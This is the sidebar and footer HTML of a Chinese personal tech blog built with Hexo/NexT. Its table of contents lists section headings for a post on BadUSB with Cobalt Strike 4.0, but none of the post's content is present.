          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#BadUsb%E9%85%8D%E5%90%88CobaltStrike4-0%E4%B8%8A%E7%BA%BF"><span class="nav-number">1.</span> <span class="nav-text">BadUsb配合CobaltStrike4.0上线</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0%EF%BC%8C%E5%AE%9E%E9%AA%8C%E6%A6%82%E8%BF%B0"><span class="nav-number">1.1.</span> <span class="nav-text">0，实验概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1%EF%BC%8CCS4%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2"><span class="nav-number">1.2.</span> <span class="nav-text">1，CS4环境部署</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%83%A8%E7%BD%B2CS4%E6%9C%8D%E5%8A%A1%E7%AB%AF"><span class="nav-number">1.2.1.</span> <span class="nav-text">部署CS4服务端</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%83%A8%E7%BD%B2CS4%E5%AE%A2%E6%88%B7%E7%AB%AF"><span class="nav-number">1.2.2.</span> <span class="nav-text">部署CS4客户端</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%86%E6%9C%A8%E9%A9%AC%E4%B8%8A%E4%BC%A0%E5%88%B0%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%A4%87%E7%94%A8"><span class="nav-number">1.2.3.</span> <span class="nav-text">将木马上传到云服务器备用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2%EF%BC%8Cbadusb%E7%83%A7%E5%BD%95"><span class="nav-number">1.3.</span> <span class="nav-text">2，badusb烧录</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E8%A3%85%E8%BD%AF%E4%BB%B6"><span class="nav-number">1.3.1.</span> <span class="nav-text">安装软件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%83%A7%E5%BD%95%E8%84%9A%E6%9C%AC"><span class="nav-number">1.3.2.</span> <span class="nav-text">烧录脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3%EF%BC%8CCS4%E5%BE%AE%E4%BF%A1%E4%B8%8A%E7%BA%BF%E6%8F%90%E7%A4%BA"><span class="nav-number">1.4.</span> <span class="nav-text">3，CS4微信上线提示</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4%EF%BC%8C%E6%9C%A8%E9%A9%AC%E5%85%8D%E6%9D%80"><span class="nav-number">1.5.</span> <span class="nav-text">4，木马免杀</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5%EF%BC%8C%E6%9C%80%E5%90%8E%E6%80%BB%E7%BB%93"><span class="nav-number">1.6.</span> <span class="nav-text">5，最后总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="xiaoluan"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">xiaoluan</p>
  <div class="site-description" itemprop="description">健康 规律 技能</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">50</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">30</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2021-08 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xiaoluan</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共32.2k字</span>
</div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
